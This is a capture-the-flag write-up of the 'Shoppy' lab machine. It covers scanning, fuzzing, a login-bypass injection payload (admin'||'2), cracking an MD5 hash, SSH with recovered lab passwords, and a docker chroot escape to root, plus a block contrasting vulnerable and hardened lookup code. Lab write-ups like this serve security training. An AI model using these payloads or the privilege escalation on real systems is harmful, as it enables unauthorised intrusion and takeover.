CTF Shoppy

Rustscan

rustscan -a 10.10.11.180

Output:

PORT     STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
9093/tcp open copycat syn-ack

/etc/hosts

echo "10.10.11.180 shoppy.htb" >> /etc/hosts

Port 80

Subdomain listing

wfuzz -c -f subdomains -w /usr/share/wordlists/wfuzz/others/subdomains.txt -u 'http://shoppy.htb' -H "Host: FUZZ.shoppy.htb" --hw 9000 --sc 200 

Add mattermost.shoppy.htb to /etc/hosts

Gobuster

gobuster dir -u http://shoppy.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --wildcard switch

Output:

/images               (Status: 301) [Size: 179] [--> /images/]
/login (Status: 200) [Size: 1074]
/admin (Status: 302) [Size: 28] [--> /login]
/assets (Status: 301) [Size: 179] [--> /assets/]
/css (Status: 301) [Size: 173] [--> /css/]
/Login (Status: 200) [Size: 1074]
/js (Status: 301) [Size: 171] [--> /js/]
/fonts (Status: 301) [Size: 177] [--> /fonts/]
/Admin (Status: 302) [Size: 28] [--> /login]
/exports (Status: 301) [Size: 181] [--> /exports/]
/LogIn (Status: 200) [Size: 1074]
/LOGIN (Status: 200) [Size: 1074]

Login page

http://shoppy.htb/login

You can bypass the login page.
I will use Burp Suite to intercept the traffic.

While I was playing with Burp Suite I got an interesting error:

The error discloses a path, which gives us a username, jaeger:
/home/jaeger/ShoppyApp/node_modules/body-parser/lib/types/json.js

Bypass auth login page

When I put a ' in the login form, the page takes more time to load.
https://book.hacktricks.xyz/pentesting-web/login-bypass/sql-login-bypass
From this list I took '||'2 and added admin at the beginning.

Search for user

I have to search for a user; it's not working with jaeger.

I enter '||'2 in the search and find a new user, josh.
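To show why the '||'2 payload above matches every account and how the lookup should have been written, here is an added example (not the writeup's code and not the ShoppyApp code): an in-memory stand-in for the user collection, a vulnerable lookup that concatenates the username into a JavaScript filter expression, and a hardened lookup that validates the input and uses exact equality. The user table and the Function()-based evaluation are constructed for this demonstration.

```javascript
// Constructed in-memory user table standing in for the application's database.
const users = [
  { username: 'admin', passwordHash: '<hash-placeholder>' },
  { username: 'josh',  passwordHash: '<hash-placeholder>' },
];

// Vulnerable pattern: the username is concatenated into a filter expression
// that the database engine later evaluates as JavaScript (a $where-style
// filter). Function() is used here only to mimic that evaluation offline.
// With the input admin'||'2 the expression becomes
//   this.username == 'admin'||'2'
// which is truthy for every document, so every user matches.
function findUserVulnerable(username) {
  const expr = `this.username == '${username}'`;
  const filter = new Function(`return (${expr});`);
  return users.filter((u) => filter.call(u));
}

// Hardened pattern: reject anything that is not a short, plain string, then
// compare with an exact-match lookup instead of an evaluated expression.
function validUsername(username) {
  return typeof username === 'string' && /^[A-Za-z0-9._-]{1,32}$/.test(username);
}

function findUserHardened(username) {
  if (!validUsername(username)) return null; // covers quotes and object payloads alike
  return users.find((u) => u.username === username) || null;
}

// Contrast the two lookups on the same input.
function compare(username) {
  const hardened = findUserHardened(username);
  return {
    vulnerableMatches: findUserVulnerable(username).length,
    hardenedMatch: hardened ? hardened.username : null,
  };
}
```

The same validation belongs on the user-search endpoint, since the writeup shows the payload working there as well as on the login form.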

Crack the password

This is a hash, probably MD5.
6ebcea65320589ca4f2f1ce039975995
https://www.dcode.fr/cipher-identifier

echo "6ebcea65320589ca4f2f1ce039975995" > hash
hashcat -m 0 hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

remembermethisway

Mattermost

http://mattermost.shoppy.htb/login

jaeger is a Linux user; I saw him in the error with Burp Suite.
Let's use SSH.

jaeger

ssh jaeger@shoppy.htb

sudo -l

1
sudo -u deploy /home/deploy/password-manager

I don't have the password; if I use strings I see nothing, but with cat it's working.

Sample

deploy

ssh deploy@shoppy.htb

Deploying@pp!
I'm using lse again.

I can use docker, so I can also exploit it with GTFOBins.
https://gtfobins.github.io/gtfobins/docker/

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

I'm root.